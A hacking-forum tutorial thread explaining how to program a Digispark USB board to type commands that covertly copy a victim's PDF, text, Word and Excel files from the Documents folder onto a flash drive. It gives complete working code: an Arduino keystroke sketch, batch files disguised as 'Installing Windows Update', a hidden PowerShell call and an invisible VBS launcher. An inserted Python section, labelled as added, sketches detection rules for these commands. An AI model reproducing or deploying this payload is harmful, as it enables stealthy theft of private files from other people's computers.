Tutorial Exfiltrating files with Digispark
Exfiltrating files with Digispark #1
[Introduction]
Some time ago I wrote a tutorial titled "1$ USB Rubber Ducky alternative"; this is somewhat of a continuation of that tutorial.
ITT: I'm going to show you how you can use a Digispark and a regular flash drive to back up files from computers to a flash drive.
For the purpose of this tutorial I will not go through setting up the Digispark dev environment; for that, take a look at https://sinister.ly/Thread-Tutorial-1-US...lternative
Quick demo:

Spoiler:



[What you'll need]
* Digispark
* Arduino software
* USB drive
* (Optional) USB hub


[Setting up the flashdrive]
1. Rename your flash drive to something unique. I named it PK because it's a shortened version of "pika". (You'll be using the name of the flash drive as a way to find where you want to put your files.)
2. Create a couple of files on the flash drive:
d.cmd (Blinks the CAPSLOCK LED when started, executes i.vbs):

Spoiler:
@echo off
start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')"
cscript %~d0\i.vbs %~d0\e.cmd
@exit
e.cmd (Copies files, blinks the CAPSLOCK LED when done):
Spoiler:
@echo off
@echo Installing Windows Update

REM Creates a directory named after the computer name, date and time
REM %~d0 = drive letter of this batch file. %COMPUTERNAME%, %date% and %time% are pretty obvious
set dst=%~d0\slurp\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%
mkdir %dst% >>nul

if Exist %USERPROFILE%\Documents (
    REM /C Continues copying even if errors occur.
    REM /Q Does not display file names while copying.
    REM /G Allows the copying of encrypted files to destination that does not support encryption.
    REM /Y Suppresses prompting to confirm you want to overwrite an existing destination file.
    REM /S Copies directories and subdirectories, unless they are empty.

    REM Documents
    xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.pdf %dst% >>nul
    xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.txt %dst% >>nul
    xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.doc %dst% >>nul
    xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.xls %dst% >>nul
)

REM Blink CAPSLOCK key
start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')"

@cls
@exit
i.vbs (Executes e.cmd invisibly):
Spoiler:
CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False

[Setting up the Digispark]
Just flash this code to your Digispark, and replace the PK on line 23 with the name of your flash drive.
Spoiler:
#include "DigiKeyboard.h"

void setup() {
  // don't need to set anything up to use DigiKeyboard
}


void loop() {
  // this is generally not necessary but with some older systems it seems to
  // prevent missing the first character after a delay:
  DigiKeyboard.sendKeyStroke(0);

  // Open cmd
  DigiKeyboard.delay(5000);
  DigiKeyboard.sendKeyStroke(0, MOD_GUI_LEFT);
  DigiKeyboard.delay(1000);
  DigiKeyboard.print("cmd");
  DigiKeyboard.delay(200);
  DigiKeyboard.sendKeyStroke(KEY_ENTER);
  DigiKeyboard.delay(1000);

  // Run d.cmd from the volume labelled PK
  DigiKeyboard.print("powershell \".((gwmi win32_volume -f 'label=''PK''').Name+'d.cmd')\"");
  DigiKeyboard.sendKeyStroke(KEY_ENTER);
  while(true){
    //do nothing
  }
}

[Final notes]
Congratulations, you're done!
You could use some cheap USB hub to make it use only one port.
The current payload will only take pdf, txt, doc, xlsx files, but you can modify the e.cmd file to add your own extensions, just keep in mind that the more extensions you add, the more time will be needed for the payload to finish its job.


[External links]
The original payload by HAK5: https://www.hak5.org/blog/hak5/stealing-...-explained
Digispark installation: http://digistump.com/wiki/digispark/tuto...connecting
My first Digispark tutorial: https://sinister.ly/Thread-Tutorial-1-US...lternative
Reply
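
The chain described in the post above (a PowerShell lookup of a volume by its label, cscript launching a .cmd from the same drive root, then xcopy sweeping Documents to another drive) leaves distinctive process-creation command lines. The Python sketch below is an added detection example, not part of the original thread; the rule names, event layout and sample events are constructed for illustration.

```python
import re

# Rule names and regexes are assumptions made for this example, keyed to the
# command lines that the post's d.cmd, e.cmd and Digispark sketch produce.
RULES = {
    # PowerShell resolving a drive by volume label (gwmi win32_volume -f 'label=...')
    "volume_label_lookup": re.compile(
        r"(?:gwmi|get-wmiobject|get-ciminstance)\s+win32_volume\b.*label\s*=", re.I),
    # cscript/wscript given a .vbs and a .cmd/.bat that sit in the same drive root
    "script_host_chain": re.compile(
        r'\b[cw]script(?:\.exe)?"?\s+"?([a-z]):\\[^\\\s"]+\.vbs"?\s+"?\1:\\[^\\\s"]+\.(?:cmd|bat)\b',
        re.I),
    # xcopy of a wildcard from a user's Documents folder to some drive
    "documents_sweep": re.compile(
        r'\bxcopy(?:\.exe)?\b.*?\b([a-z]):\\Users\\[^\\]+\\Documents\\\*\.\w+\s+"?([a-z]):\\',
        re.I),
}

# Constructed process-creation events (the kind of data Sysmon Event ID 1 records).
EVENTS = [
    {"cmdline": "powershell \".((gwmi win32_volume -f 'label=''PK''').Name+'d.cmd')\""},
    {"cmdline": r"cscript E:\i.vbs E:\e.cmd"},
    {"cmdline": r"xcopy /C /Q /G /Y /S C:\Users\alice\Documents\*.pdf E:\slurp\PC1_20171012_145800"},
    {"cmdline": r"powershell Get-ChildItem C:\Temp"},  # benign
    {"cmdline": r"xcopy /S C:\build\out D:\backup"},   # benign
]

def classify(cmdline):
    """Return the names of the rules that match one command line."""
    hits = []
    for name, rx in RULES.items():
        m = rx.search(cmdline)
        if not m:
            continue
        # A Documents copy that stays on the same drive is not cross-volume.
        if name == "documents_sweep" and m.group(1).lower() == m.group(2).lower():
            continue
        hits.append(name)
    return hits

def triage(events):
    """Map each fired rule to event indexes; two distinct rules is 'high'."""
    fired = {}
    for i, ev in enumerate(events):
        for rule in classify(ev["cmdline"]):
            fired.setdefault(rule, []).append(i)
    verdict = "high" if len(fired) >= 2 else "low" if fired else "none"
    return verdict, fired
```

The command line alone does not say whether the destination drive is removable, so a production rule would join these hits with device-arrival or volume-mount events for the same host and time window.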

RE: Exfiltrating files with Digispark #2
It works quite well with very little hassle. I have accumulated computing tasks, who knows if I'll ever get to doing this.

As a side note, what lappy is it? It looks like an Acer Predator (but isn't), or perhaps an Asus ROG.

Reply

RE: Exfiltrating files with Digispark #3
(10-12-2017, 02:58 PM)mothered Wrote: As a side note, what lappy is it? It looks like an Acer Predator (but isn't), or perhaps an Asus ROG.

Lenovo Y520

Reply

RE: Exfiltrating files with Digispark #4
(10-12-2017, 03:05 PM)Pikami Wrote: Lenovo Y520

Now that I've searched it via Google Images, it looks quite appealing. I've actually just changed the colors on my backlit keyboard to half green/red. It seems to illuminate better in the dark.

On topic, thanks again for the contribution. I may have time to check it out this weekend.

Reply





